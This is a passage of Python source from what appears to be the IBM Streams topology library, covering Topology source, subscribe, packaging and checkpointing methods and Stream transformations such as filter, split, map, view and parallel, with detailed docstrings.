REST apis, databases, message systems etc. Such a source will typically
be implemented as class that when called returns an iterable.
To allow checkpointing of state standard methods ``__enter__``
and ``__exit__`` are implemented to allow creation of runtime
objects that cannot be persisted, for example a file handle.
At checkpoint time state is preserved through standard pickling
using ``__getstate__`` and (optionally) ``__setstate__``.
Stateless source that polls a REST API every ten seconds to
get a JSON object (`dict`) with current time details::
import requests
import time
class RestJsonReader(object):
def __init__(self, url, period):
self.url = url
self.period = period
self.session = None
def __enter__(self):
self.session = requests.Session()
self.session.headers.update({'Accept': 'application/json'})
def __exit__(self, exc_type, exc_value, traceback):
if self.session:
self.session.close()
self.session = None
def __call__(self):
return self
def __iter__(self):
return self
def __next__(self):
time.sleep(self.period)
return self.session.get(self.url).json()
def __getstate__(self):
# Remove the session from the persisted state
return {'url':self.url, 'period':self.period}
def main():
utc_now = 'http://worldclockapi.com/api/json/utc/now'
topo = Topology()
times = topo.source(RestJsonReader(10, utc_now))
.. warning::
Source functions that use generators are not supported
when checkpointing or within a consistent region. This
is because generators cannot be pickled (even when using `dill`).
.. versionchanged:: 1.14
Type hints are used to define the returned stream schema.
"""
sl = _SourceLocation(_source_info(), "source")
import streamsx.topology.composite
if isinstance(func, streamsx.topology.composite.Source):
return func._add(self, name)
_name = self.graph._requested_name(name, action='source', func=func)
hints = streamsx._streams._hints.schema_iterable(func, self)
if inspect.isroutine(func) or callable(func):
pass
else:
func = streamsx.topology.runtime._IterableInstance(func)
schema = hints.schema if hints else None
# source is always stateful
op = self.graph.addOperator(self.opnamespace+"::Source", func, name=_name, sl=sl, nargs=0)
op._layout(kind='Source', name=op.runtime_id, orig_name=name)
oport = op.addOutputPort(schema=schema, name=_name)
return Stream(self, oport)._make_placeable()._add_hints(hints)
def subscribe(self, topic, schema=streamsx.topology.schema.CommonSchema.Python, name=None, connect=None, buffer_capacity=None, buffer_full_policy=None):
"""
Subscribe to a topic published by other Streams applications.
A Streams application may publish a stream to allow other
Streams applications to subscribe to it. A subscriber matches a
publisher if the topic and schema match.
By default a stream is subscribed as :py:const:`~streamsx.topology.schema.CommonSchema.Python` objects
which connects to streams published to topic by Python Streams applications.
Structured schemas are subscribed to using an instance of
:py:class:`StreamSchema`. A Streams application publishing
structured schema streams may have been implemented in any
programming language supported by Streams.
JSON streams are subscribed to using schema :py:const:`~streamsx.topology.schema.CommonSchema.Json`.
Each tuple on the returned stream will be a Python dictionary
object created by ``json.loads(tuple)``.
A Streams application publishing JSON streams may have been implemented in any programming language
supported by Streams.
String streams are subscribed to using schema :py:const:`~streamsx.topology.schema.CommonSchema.String`.
Each tuple on the returned stream will be a Python string object.
A Streams application publishing string streams may have been implemented in any programming language
supported by Streams.
Subscribers can ensure they do not slow down matching publishers
by using a buffered connection with a buffer full policy
that drops tuples.
Args:
topic(str): Topic to subscribe to.
schema(~streamsx.topology.schema.StreamSchema): schema to subscribe to.
name(str): Name of the subscribed stream, defaults to a generated name.
connect(SubscribeConnection): How subscriber will be connected to matching publishers. Defaults to :py:const:`~SubscribeConnection.Direct` connection.
buffer_capacity(int): Buffer capacity in tuples when `connect` is set to :py:const:`~SubscribeConnection.Buffered`. Defaults to 1000 when `connect` is `Buffered`. Ignored when `connect` is `None` or `Direct`.
buffer_full_policy(~streamsx.types.CongestionPolicy): Policy when a pulished tuple arrives and the subscriber's buffer is full. Defaults to `Wait` when `connect` is `Buffered`. Ignored when `connect` is `None` or `Direct`.
Returns:
Stream: A stream whose tuples have been published to the topic by other Streams applications.
.. versionchanged:: 1.9 `connect`, `buffer_capacity` and `buffer_full_policy` parameters added.
.. seealso:`SubscribeConnection`
"""
schema = streamsx.topology.schema._normalize(schema)
_name = self.graph._requested_name(name, 'subscribe')
sl = _SourceLocation(_source_info(), "subscribe")
# subscribe is never stateful
op = self.graph.addOperator(kind="com.ibm.streamsx.topology.topic::Subscribe", sl=sl, name=_name, stateful=False)
oport = op.addOutputPort(schema=schema, name=_name)
params = {'topic': topic, 'streamType': schema}
if connect is not None and connect != SubscribeConnection.Direct:
params['connect'] = connect
if buffer_capacity:
params['bufferCapacity'] = int(buffer_capacity)
if buffer_full_policy:
params['bufferFullPolicy'] = buffer_full_policy
op.setParameters(params)
op._layout_group('Subscribe', name if name else _name)
return Stream(self, oport)._make_placeable()
def add_file_dependency(self, path, location):
"""
Add a file or directory dependency into an Streams application bundle.
Ensures that the file or directory at `path` on the local system
will be available at runtime.
The file will be copied and made available relative to the
application directory. Location determines where the file
is relative to the application directory. Two values for
location are supported `etc` and `opt`.
The runtime path relative to application directory is returned.
The copy is made during the submit call thus the contents of
the file or directory must remain availble until submit returns.
For example calling
``add_file_dependency('/tmp/conf.properties', 'etc')``
will result in contents of the local file `conf.properties`
being available at runtime at the path `application directory`/etc/conf.properties. This call returns ``etc/conf.properties``.
Python callables can determine the application directory at
runtime with :py:func:`~streamsx.ec.get_application_directory`.
For example the path above at runtime is
``os.path.join(streamsx.ec.get_application_directory(), 'etc', 'conf.properties')``
Args:
path(str): Path of the file on the local system.
location(str): Location of the file in the bundle relative to the application directory.
Returns:
str: Path relative to application directory that can be joined at runtime with ``get_application_directory``.
.. versionadded:: 1.7
"""
if location not in {'etc', 'opt'}:
raise ValueError(location)
if not os.path.isfile(path) and not os.path.isdir(path):
raise ValueError(path)
path = os.path.abspath(path)
if location not in self._files:
self._files[location] = [path]
else:
self._files[location].append(path)
return location + '/' + os.path.basename(path)
def add_pip_package(self, requirement):
"""
Add a Python package dependency for this topology.
If the package defined by the requirement specifier
is not pre-installed on the build system then the
package is installed using `pip` and becomes part
of the Streams application bundle (`sab` file).
The package is expected to be available from `pypi.org`.
If the package is already installed on the build system
then it is not added into the `sab` file.
The assumption is that the runtime hosts for a Streams
instance have the same Python packages installed as the
build machines. This is always true for IBM Cloud
Pak for Data and the Streaming Analytics service on IBM Cloud.
The project name extracted from the requirement
specifier is added to :py:attr:`~exclude_packages`
to avoid the package being added by the dependency
resolver. Thus the package should be added before
it is used in any stream transformation.
When an application is run with trace level ``info``
the available Python packages on the running system
are listed to application trace. This includes
any packages added by this method.
Example::
topo = Topology()
# Add dependency on pint package
# and astral at version 0.8.1
topo.add_pip_package('pint')
topo.add_pip_package('astral==0.8.1')
Args:
requirement(str): Package requirements specifier.
.. warning::
Only supported when using the build service with
a Streams instance in Cloud Pak for Data
or Streaming Analytics service on IBM Cloud.
.. note::
Installing packages through `pip` is preferred to
the automatic dependency checking performed on local
modules. This is because `pip` will perform a full
install of the package including any dependent packages
and additional files, such as shared libraries, that
might be missed by dependency discovery.
.. versionadded:: 1.9
"""
self._pip_packages.append(str(requirement))
pr = pkg_resources.Requirement.parse(requirement)
self.exclude_packages.add(pr.project_name)
def create_submission_parameter(self, name, default=None, type_=None):
""" Create a submission parameter.
A submission parameter is a handle for a value that
is not defined until topology submission time. Submission
parameters enable the creation of reusable topology bundles.
A submission parameter has a `name`. The name must be unique
within the topology.
The returned parameter is a `callable`.
Prior to submitting the topology, while constructing the topology,
invoking it returns ``None``.
After the topology is submitted, invoking the parameter
within the executing topology returns the actual submission time value
(or the default value if it was not set at submission time).
Submission parameters may be used within functional logic. e.g.::
threshold = topology.create_submission_parameter('threshold', 100);
# s is some stream of integers
s = ...
s = s.filter(lambda v : v > threshold())
.. note::
The parameter (value returned from this method) is only
supported within a lambda expression or a callable
that is not a function.
The default type of a submission parameter's value is a `str`.
When a `default` is specified
the type of the value matches the type of the default.
If `default` is not set, then the type can be set with `type_`.
The types supported are ``str``, ``int``, ``float`` and ``bool``.
Topology submission behavior when a submission parameter
lacking a default value is created and a value is not provided at
submission time is defined by the underlying topology execution runtime.
* Submission fails for contexts ``DISTRIBUTED``, ``STANDALONE``, and ``STREAMING_ANALYTICS_SERVICE``.
Args:
name(str): Name for submission parameter.
default: Default parameter when submission parameter is not set.
type_: Type of parameter value when default is not set. Supported values are `str`, `int`, `float` and `bool`.
.. versionadded:: 1.9
"""
if name in self._submission_parameters:
raise ValueError("Submission parameter {} already defined.".format(name))
sp = streamsx.topology.runtime._SubmissionParam(name, default, type_)
self._submission_parameters[name] = sp
return sp
@property
def checkpoint_period(self):
"""Enable checkpointing for the topology, and define the checkpoint
period.
When checkpointing is enabled, the state of all stateful operators
is saved periodically. If the operator restarts, its state is
restored from the most recent checkpoint.
The checkpoint period is the frequency at which checkpoints will
be taken. It can either be a :py:class:`~datetime.timedelta` value
or a floating point value in seconds. It must be at 0.001
seconds or greater.
A stateful operator is an operator whose callable is an instance of a
Python callable class.
Examples::
# Create a topology that will checkpoint every thirty seconds
topo = Topology()
topo.checkpoint_period = 30.0
::
# Create a topology that will checkpoint every two minutes
topo = Topology()
topo.checkpoint_period = datetime.timedelta(minutes=2)
.. versionadded:: 1.11
"""
return self._checkpoint_period
@checkpoint_period.setter
def checkpoint_period(self, period):
if (isinstance(period, datetime.timedelta)):
self._checkpoint_period = period.total_seconds()
else:
self._checkpoint_period = float (period)
# checkpoint period must be greater or equal to 0.001
if self._checkpoint_period < 0.001:
raise ValueError("checkpoint_period must be 0.001 or greater")
def _prepare(self):
"""Prepare object prior to SPL generation."""
self._generate_requirements()
def _generate_requirements(self):
"""Generate the info to create requirements.txt in the toookit."""
if not self._pip_packages:
return
reqs = ''
for req in self._pip_packages:
reqs += "{}\n".format(req)
reqs_include = {
'contents': reqs,
'target':'opt/python/streams',
'name': 'requirements.txt'}
if 'opt' not in self._files:
self._files['opt'] = [reqs_include]
else:
self._files['opt'].append(reqs_include)
def _add_job_control_plane(self):
"""
Add a JobControlPlane operator to the topology, if one has not already
been added. If a JobControlPlane operator has already been added,
this has no effect.
"""
if not self._has_jcp:
jcp = self.graph.addOperator(kind="spl.control::JobControlPlane", name="JobControlPlane")
jcp.viewable = False
self._has_jcp = True
class Stream(_placement._Placement, object):
"""
The Stream class is the primary abstraction within a streaming application. It represents a potentially infinite
series of tuples which can be operated upon to produce another stream, as in the case of :py:meth:`map`, or
terminate a stream, as in the case of :py:meth:`for_each`.
.. versionchanged::1.14
Type hints are used to define stream schemas and verify transformations
at declaration time.
"""
def __init__(self, topology, oport, other=None):
self.topology = topology
self.oport = oport
self._placeable = False
self._alias = None
self._hints = None
topology._streams[self.oport.name] = self
self._json_stream = None
if other:
self._add_hints(other._hints)
def _op(self):
if not self._placeable:
raise TypeError()
return self.oport.operator
def _add_hints(self, hints):
self._hints = hints
return self
@property
def name(self):
"""
Unique name of the stream.
When declaring a stream a `name` parameter can be provided.
If the supplied name is unique within its topology then
it will be used as-is, otherwise a variant will be provided
that is unique within the topology.
If a `name` parameter was not provided when declaring a stream
then the stream is assigned a unique generated name.
Returns:
str: Name of the stream.
.. seealso:: :py:meth:`aliased_as`
.. warning::
If the name is not a valid SPL identifier or longer than
80 characters then the name will be
converted to a valid SPL identifier at compile and runtime.
This identifier will be the name used in the REST api and log/trace.
Visualizations of the runtime graph uses `name` rather
than the converted identifier.
A valid SPL identifier consists only of
characters ``A-Z``, ``a-z``, ``0-9``, ``_`` and
must not start with a number or be an SPL keyword.
See :py:meth:`runtime_id <runtime_id>`.
"""
return self._alias if self._alias else self.oport.name
@property
def runtime_id(self):
"""
Return runtime identifier.
If :py:meth:`name <name>` is not a valid SPL identifier then the
runtime identifier will be valid SPL identifier that represents `name`.
Otherwise `name` is returned.
The runtime identifier is how the underlying SPL operator
or output port is named in the REST api and trace/log files.
If a topology unique name is supplied when creating a stream then runtime
identifier is fixed regardless of other changes in the topology.
The algorithm to determine the runtime name (for clients that
cannot call this method, for example, remote REST clients gathering
metrics) is as follows.
If the length of :py:meth:`name <name>` is less than or equal
to 80 and ``name`` is an SPL identifier then ``name`` is used.
An SPL identifier consists only of the characters ``A-Z``, ``a-z``
``0-9`` and ``_``, must not start with ``0-9`` and must not be
an SPL keyword.
Otherwise the identifier has the form ``prefix_suffix``.
``prefix`` is the kind of the SPL operator stripped of
its namespace and ``::``. For all functional methods
the operator kind is the method name with the first
character upper-cased.
For example, ``Filter`` for :py:meth:`filter`, ``Beacon`` for
``spl::utility::Beacon``.
``suffix`` is a hashed version of name, an MD5 digest
``d`` is calculated from the UTf-8 encoding of ``name``.
``d`` is shortened by having its first eight bytes xor folded
with its last eight bytes. ``d`` is then base64 encoded
to produce a string. Padding ``=`` and ``+`` and ``/`` characters
are removed from the string.
For example, ``s.filter(lambda x : True, name='你好')``
results in a runtime identifier of ``Filter_oGwCfhWRg4``.
The default mapping can be overridden by setting :py:attr:`Topology.name_to_runtime_id` to a callable that returns a valid identifier for its single argument. The returned identifier should be unique with the topology. For example usinig a pre-populated `dict` as the mapper::
topo = Topology()
names = {'你好', 'Buses', '培养':'Trains'}
topo.name_to_runtime_id = names.get
buses = toopo.source(..., name='你好')
trains = topo.source(..., name='培养'}
// buses.runtime_id will be Buses
// trains.runtime_id will be Trains
Returns:
str: Runtime identifier of the stream.
.. versionadded:: 1.14
"""
return self.oport.runtime_id
def aliased_as(self, name):
"""
Create an alias of this stream.
Returns an alias of this stream with name `name`.
When invocation of an SPL operator requires an
:py:class:`~streamsx.spl.op.Expression` against
an input port this can be used to ensure expression
matches the input port alias regardless of the name
of the actual stream.
Example use where the filter expression for a ``Filter`` SPL operator
uses ``IN`` to access input tuple attribute ``seq``::
s = ...
s = s.aliased_as('IN')
params = {'filter': op.Expression.expression('IN.seq % 4ul == 0ul')}
f = op.Map('spl.relational::Filter', stream, params = params)
Args:
name(str): Name for returned stream.
Returns:
Stream: Alias of this stream with ``name`` equal to `name`.
.. versionadded:: 1.9
"""
stream = copy.copy(self)
stream._alias = name
return stream
def for_each(self, func, name=None):
"""
Sends information as a stream to an external system.
The transformation defined by `func` is a callable
or a composite transformation.
.. rubric:: Callable transformation
If `func` is callable then for each tuple `t` on this
stream ``func(t)`` is called.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by return a true value from its ``__exit__`` method. When an
exception is suppressed no further processing occurs for the
input tuple that caused the exception.
.. rubric:: Composite transformation
A composite transformation is an instance of :py:class:`~streamsx.topology.composite.ForEach`. Composites allow the application developer to use
the standard functional style of the topology api while allowing
allowing expansion of a `for_each` transform to multiple basic
transformations.
Args:
func: A callable that takes a single parameter for the tuple and returns None.
name(str): Name of the stream, defaults to a generated name.
Returns:
streamsx.topology.topology.Sink: Stream termination.
.. rubric:: Type hints
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
.. versionchanged:: 1.7
Now returns a :py:class:`Sink` instance.
.. versionchanged:: 1.14
Support for type hints and composite transformations.
"""
import streamsx.topology.composite
if isinstance(func, streamsx.topology.composite.ForEach):
return func._add(self, name)
streamsx._streams._hints.check_for_each(func, self)
sl = _SourceLocation(_source_info(), 'for_each')
_name = self.topology.graph._requested_name(name, action='for_each', func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::ForEach", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
op._layout(kind='ForEach', name=op.runtime_id, orig_name=name)
return Sink(op)
def filter(self, func, name=None):
"""
Filters tuples from this stream using the supplied callable `func`.
For each stream tuple `t` on the stream ``func(t)`` is called, if the return evaluates to ``True`` the
tuple will be present on the returned stream, otherwise the tuple is filtered out.
Args:
func: Filter callable that takes a single parameter for the stream tuple.
name(str): Name of the stream, defaults to a generated name.
If invoking ``func`` for a stream tuple raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by return a true value from its ``__exit__`` method. When an
exception is suppressed no tuple is submitted to the filtered
stream corresponding to the input tuple that caused the exception.
Returns:
Stream: A Stream containing tuples that have not been filtered out. The schema of the returned stream is the same as this stream's schema.
.. rubric:: Type hints
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
"""
streamsx._streams._hints.check_filter(func, self)
sl = _SourceLocation(_source_info(), 'filter')
_name = self.topology.graph._requested_name(name, action="filter", func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Filter", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
op._layout(kind='Filter', name=op.runtime_id, orig_name=name)
oport = op.addOutputPort(schema=self.oport.schema, name=_name)
return Stream(self.topology, oport)._make_placeable()
def split(self, into, func, names=None, name=None):
"""
Splits tuples from this stream into multiple independent streams
using the supplied callable `func`.
For each tuple on the stream ``int(func(tuple))`` is called, if the
return is zero or positive then the (unmodified) tuple will be
present on one, and only one, of the output streams.
The specific stream will
be at index ``int(func(tuple)) % N`` in the returned list,
where ``N`` is the number of output
streams. If the return is negative then the tuple is dropped.
``split`` is used to declare disparate transforms on each
split stream. This differs to :py:meth:`parallel` where
each channel has the same logic transforms.
Args:
into(int): Number of streams the input is split into, must be greater than zero.
func: Split callable that takes a single parameter for the tuple.
names(list[str]): Names of the returned streams, in order. If not supplied or a stream doesn't have an entry in `names` then a generated name is used. Entries are used to generated the field names of the returned named tuple.
name(str): Name of the split transform, defaults to a generated name.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by return a true value from its ``__exit__`` method. When an
exception is suppressed no tuple is submitted to the filtered
stream corresponding to the input tuple that caused the exception.
Returns:
namedtuple: Named tuple of streams this stream is split across. All returned streams have the same schema as this stream.
.. rubric:: Type hints
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
.. rubric:: Examples
Example of splitting a stream based upon message severity, dropping
any messages with unknown severity, and then performing different
transforms for each severity::
msgs = topo.source(ReadMessages())
SEVS = {'H':0, 'M':1, 'L':2}
severities = msg.split(3, lambda SEVS.get(msg.get('SEV'), -1),
names=['high','medium','low'], name='SeveritySplit')
high_severity = severities.high
high_severity.for_each(SendAlert())
medium_severity = severities.medium
medium_severity.for_each(LogMessage())
low_severity = severities.low
low_severity.for_each(Archive())
.. seealso:: :py:meth:`parallel`
.. versionadded:: 1.13
"""
streamsx._streams._hints.check_split(func, self)
sl = _SourceLocation(_source_info(), 'split')
_name = self.topology.graph._requested_name(name, action="split", func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Split", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
op._layout(kind='Split', name=op.runtime_id, orig_name=name)
streams = []
nt_names = []
op_name = name if name else _name
for port_id in range(into):
# logical name
lsn = names[port_id] if names and len(names) > port_id else op_name + '_' + str(port_id)
sn = self.topology.graph._requested_name(lsn)
oport = op.addOutputPort(schema=self.oport.schema, name=sn)
streams.append(Stream(self.topology, oport)._make_placeable())
nt_names.append(lsn)
op._layout(name=oport.runtime_id, orig_name=lsn)
nt = collections.namedtuple(op_name, nt_names, rename=True)
return nt._make(streams)
def _map(self, func, schema, name=None):
schema = streamsx.topology.schema._normalize(schema)
_name = self.topology.graph._requested_name(name, action="map", func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::Map", func, name=_name, stateful=stateful)
op.addInputPort(outputPort=self.oport)
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
oport = op.addOutputPort(schema=schema, name=_name)
op._layout(name=op.runtime_id, orig_name=name)
return Stream(self.topology, oport)._make_placeable()
def view(self, buffer_time = 10.0, sample_size = 10000, name=None, description=None, start=False):
"""
Defines a view on a stream.
A view is a continually updated sampled buffer of a streams's tuples.
Views allow visibility into a stream from external clients such
as Jupyter Notebooks, the Streams console,
`Microsoft Excel <https://www.ibm.com/support/knowledgecenter/SSCRJU_4.2.0/com.ibm.streams.excel.doc/doc/excel_overview.html>`_ or REST clients.
The view created by this method can be used by external clients
and through the returned :py:class:`~streamsx.topology.topology.View` object after the topology is submitted. For example a Jupyter Notebook can
declare and submit an application with views, and then
use the resultant `View` objects to visualize live data within the streams.
When the stream contains Python objects then they are converted
to JSON.
Args:
buffer_time: Specifies the buffer size to use measured in seconds.
sample_size: Specifies the number of tuples to sample per second.
name(str): Name of the view. Name must be unique within the topology. Defaults to a generated name.
description: Description of the view.
start(bool): Start buffering data when the job is submitted.
If `False` then the view starts buffering data when the first
remote client accesses it to retrieve data.
Returns:
streamsx.topology.topology.View: View object which can be used to access the data when the
topology is submitted.
.. note:: Views are only supported when submitting to distributed
contexts including Streaming Analytics service.
"""
if name is None:
name = ''.join(random.choice('0123456789abcdef') for x in range(16))
if self.oport.schema == streamsx.topology.schema.CommonSchema.Python:
if self._json_stream:
view_stream = self._json_stream
else:
self._json_stream = self.as_json(force_object=False)._layout(hidden=True)
view_stream = self._json_stream
# colocate map operator with stream that is being viewed.
if self._placeable:
self._colocate(view_stream, 'view')
else:
view_stream = self
port = view_stream.oport.runtime_id
view_config = {
'name': name,
'port': port,
'description': description,
'bufferTime': buffer_time,
'sampleSize': sample_size}
if start:
view_config['activateOption'] = 'automatic'
view_stream.oport.operator.addViewConfig(view_config)
_view = View(name)
self.topology.graph._views.append(_view)
return _view
def map(self, func=None, name=None, schema=None):
"""
Maps each tuple from this stream into 0 or 1 stream tuples.
The transformation defined by `func` is a callable
or a composite transformation.
.. rubric:: Callable transformation
For each tuple on this stream ``result = func(tuple)`` is called.
If `result` is not `None` then the result will be submitted
as a tuple on the returned stream. If `result` is `None` then
no tuple submission will occur.
By default the submitted tuple is ``result`` without modification
resulting in a stream of picklable Python objects. Setting the
`schema` parameter changes the type of the stream and
modifies each ``result`` before submission.
* ``object`` or :py:const:`~streamsx.topology.schema.CommonSchema.Python` - The default: `result` is submitted.
* ``str`` type or :py:const:`~streamsx.topology.schema.CommonSchema.String` - A stream of strings: ``str(result)`` is submitted.
* ``json`` or :py:const:`~streamsx.topology.schema.CommonSchema.Json` - A stream of JSON objects: ``result`` must be convertable to a JSON object using `json` package.
* :py:const:`~streamsx.topology.schema.StreamSchema` - A structured stream. `result` must be a `dict` or (Python) `tuple`. When a `dict` is returned the outgoing stream tuple attributes are set by name, when a `tuple` is returned stream tuple attributes are set by position.
* string value - Equivalent to passing ``StreamSchema(schema)``
.. rubric:: Composite transformation
A composite transformation is an instance of :py:class:`~streamsx.topology.composite.Map`. Composites allow the application developer to use
the standard functional style of the topology api while allowing
allowing expansion of a `map` transform to multiple basic
transformations.
Args:
func: A callable that takes a single parameter for the tuple.
If not supplied then a function equivalent to ``lambda tuple_ : tuple_`` is used.
name(str): Name of the mapped stream, defaults to a generated name.
schema(StreamSchema|CommonSchema|str): Schema of the resulting stream.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by return a true value from its ``__exit__`` method. When an
exception is suppressed no tuple is submitted to the mapped
stream corresponding to the input tuple that caused the exception.
Returns:
Stream: A stream containing tuples mapped by `func`.
.. rubric:: Type hints
If `schema` is not set then the return type hint on `func` define the
schema of the returned stream, defaulting to
:py:const:`~streamsx.topology.schema.CommonSchema.Python` if no
type hints are present.
For example `reading_from_json` has a type hint that
defines it as returning ``SensorReading`` instances (typed named tuples).
Thus `readings` has a structured schema matching ``SensorReading`` ::
def reading_from_json(value:dict) -> SensorReading:
return SensorReading(value['id'], value['timestamp'], value['reading'])
topo = Topology()
json_readings = topo.source(HttpReadings()).as_json()
readings = json_readings.map(reading_from_json)
The argument type hint on `func` is used (if present) to verify
at topology declaration time that it is compatible with the
type of tuples on this stream.
.. versionadded:: 1.7 `schema` argument added to allow conversion to
a structured stream.
.. versionadded:: 1.8 Support for submitting `dict` objects as stream tuples to a structured stream (in addition to existing support for `tuple` objects).
.. versionchanged:: 1.11 `func` is optional.
"""
import streamsx.topology.composite
if isinstance(func, streamsx.topology.composite.Map):
return func._add(self, schema, name)
# Schema mapping only, if no change then return original
if func is None and name is None and (schema is not None and
streamsx.topology.schema._normalize(schema) == self.oport.schema):
return self
hints = None
if func is not None:
hints = streamsx._streams._hints.check_map(func, self)
if schema is None:
schema = hints.schema if hints else streamsx.topology.schema.CommonSchema.Python
if func is None:
func = streamsx.topology.runtime._identity
if name is None:
name = 'identity'
ms = self._map(func, schema=schema, name=name)._layout('Map')
ms.oport.operator.sl = _SourceLocation(_source_info(), 'map')
return ms._add_hints(hints)
def flat_map(self, func=None, name=None):
"""
Maps and flatterns each tuple from this stream into 0 or more tuples.
For each tuple on this stream ``func(tuple)`` is called.
If the result is not `None` then the the result is iterated over
with each value from the iterator that is not `None` will be submitted
to the return stream.
If the result is `None` or an empty iterable then no tuples are submitted to
the returned stream.
Args:
func: A callable that takes a single parameter for the tuple.
If not supplied then a function equivalent to ``lambda tuple_ : tuple_`` is used.
This is suitable when each tuple on this stream is an iterable to be flattened.
name(str): Name of the flattened stream, defaults to a generated name.
If invoking ``func`` for a tuple on the stream raises an exception
then its processing element will terminate. By default the processing
element will automatically restart though tuples may be lost.
If ``func`` is a callable object then it may suppress exceptions
by return a true value from its ``__exit__`` method. When an
exception is suppressed no tuples are submitted to the flattened
and mapped stream corresponding to the input tuple
that caused the exception.
Returns:
Stream: A Stream containing flattened and mapped tuples.
Raises:
TypeError: if `func` does not return an iterator nor None
.. versionchanged:: 1.11 `func` is optional.
"""
hints = None
if func is None:
func = streamsx.topology.runtime._identity
if name is None:
name = 'flatten'
else:
hints = streamsx._streams._hints.check_flat_map(func, self)
sl = _SourceLocation(_source_info(), 'flat_map')
_name = self.topology.graph._requested_name(name, action='flat_map', func=func)
stateful = _determine_statefulness(func)
op = self.topology.graph.addOperator(self.topology.opnamespace+"::FlatMap", func, name=_name, sl=sl, stateful=stateful)
op.addInputPort(outputPort=self.oport)
schema = hints.schema if hints else streamsx.topology.schema.CommonSchema.Python
streamsx.topology.schema.StreamSchema._fnop_style(self.oport.schema, op, 'pyStyle')
oport = op.addOutputPort(name=_name, schema=schema)
return Stream(self.topology, oport)._make_placeable()._layout('FlatMap', name=op.runtime_id, orig_name=name)._add_hints(hints)
def isolate(self):
"""
Guarantees that the upstream operation will run in a separate processing element from the downstream operation
Returns:
Stream: Stream whose subsequent immediate processing will occur in a separate processing element.
"""
op = self.topology.graph.addOperator("$Isolate$")
# does the addOperator above need the packages
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def low_latency(self):
"""
The function is guaranteed to run in the same process as the
upstream Stream function. All streams that are created from the returned stream
are also guaranteed to run in the same process until end_low_latency()
is called.
Returns:
Stream
"""
op = self.topology.graph.addOperator("$LowLatency$")
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def end_low_latency(self):
"""
Returns a Stream that is no longer guaranteed to run in the same process
as the calling stream.
Returns:
Stream
"""
op = self.topology.graph.addOperator("$EndLowLatency$")
op.addInputPort(outputPort=self.oport)
oport = op.addOutputPort(schema=self.oport.schema)
return Stream(self.topology, oport, other=self)
def parallel(self, width, routing=Routing.ROUND_ROBIN, func=None, name=None):
"""
Split stream into channels and start a parallel region.
Returns a new stream that will contain the contents of
this stream with tuples distributed across its channels.
The returned stream starts a parallel region where all
downstream transforms are replicated across `width` channels.
A parallel region is terminated by :py:meth:`end_parallel`
or :py:meth:`for_each`.
Any transform (such as :py:meth:`map`, :py:meth:`filter`, etc.) in
a parallel region has a copy of its callable executing
independently in parallel. Channels remain independent
of other channels until the region is terminated.
For example with this topology fragment a parallel region
of width 3 is created::
s = ...
p = s.parallel(3)
p = p.filter(F()).map(M())
e = p.end_parallel()
e.for_each(E())
Tuples from ``p`` (parallelized ``s``) are distributed
across three channels, 0, 1 & 2
and are independently processed by three instances of ``F`` and ``M``.
The tuples that pass the filter ``F`` in channel 0 are then mapped
by the instance of ``M`` in channel 0, and so on for channels 1 and 2.
The channels are combined by ``end_parallel`` and so a single instance
of ``E`` processes all the tuples from channels 0, 1 & 2.
This stream instance (the original) is outside of the parallel region
and so any downstream transforms are executed normally.
Adding this `map` transform would result in tuples
on ``s`` being processed by a single instance of ``N``::
n = s.map(N())
The number of channels is set by `width` which may be an `int` greater
than zero or a submission parameter created by
:py:meth:`Topology.create_submission_parameter`.
With IBM Streams 4.3 or later the number of channels can be
dynamically changed at runtime.
Tuples are routed to channels based upon `routing`, see :py:class:`Routing`.
A parallel region can have multiple termination points, for
example when a stream within the stream has multiple transforms
against it::
s = ...
p = s.parallel(3)
m1p = p.map(M1())
m2p = p.map(M2())
p.for_each(E())
m1 = m1p.end_parallel()
m2 = m2p.end_parallel()
Parallel regions can be nested, for example::
s = ...
m = s.parallel(2).map(MO()).parallel(3).map(MI()).end_parallel().end_parallel()
In this case there will be two instances of ``MO`` (the outer region) and six (2x3) instances of ``MI`` (the inner region).
Streams created by :py:meth:`~Topology.source` or
:py:meth:`~Topology.subscribe` are placed in a parallel region
by :py:meth:`set_parallel`.
Args:
width (int): Degree of parallelism.
routing(Routing): Denotes what type of tuple routing to use.
func: Optional function called when :py:const:`Routing.HASH_PARTITIONED` routing is specified.
The function provides an integer value to be used as the hash that determines
the tuple channel routing.
name (str): The name to display for the parallel region.
Returns:
Stream: A stream for which subsequent transformations will be executed in parallel.
.. seealso:: :py:meth:`set_parallel`, :py:meth:`end_parallel`, :py:meth:`split`
"""
_name = name
if _name is None:
_name = self.name + '_parallel'
_name = self.topology.graph._requested_name(_name, action='parallel', func=func)
